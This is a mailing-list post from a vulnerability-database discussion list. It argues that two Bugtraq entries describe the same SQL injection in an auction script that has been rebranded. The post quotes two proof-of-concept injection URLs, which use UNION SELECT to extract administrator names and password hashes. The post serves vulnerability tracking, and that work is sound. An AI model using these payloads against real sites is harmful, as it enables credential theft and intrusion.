[VIM] Bugtraq Ids 37702 vs 43591
George A. Theall
theall at tenable.com
Thu Sep 30 11:40:51 CDT 2010
The newly-created Bugtraq Id 43591 covers a SQL injection in a product
named MyPhpAuction -- apparently user-input to the 'id' parameter of
the 'product_desc.php' is not sanitized before being used in a
database query. SecurityFocus gives as a PoC:
http://www.example.com/product_desc.php?id=-5+union+all+select+1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--
Notice the "zeeauctions_admin"? Looks like the product is just a
rebranded version of that, no? And indeed, if you go to the product
page (http://galaxyscriptz.com/products/MyPhpAuction-2010.html),
you'll notice the demo links to http://www.canadianelitehosting.com/Demos/ZeeAuctions/
, which appears to be that based on its banner.
Given this, the BID seems to be a dup of BID 37702, which gives as a
PoC:
http://www.example.com/auction/product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_adm
I'm not clear about the attribution, but this seems to correspond to
EDB Id 11047 although it's been truncated (cut-and-paste error?).
Taking this into consideration, these two BIDs seem to be duplicates.
Rob, did you guys at SecurityFocus look into this at all?
George
--
theall at tenablesecurity.com
More information about the VIM
mailing list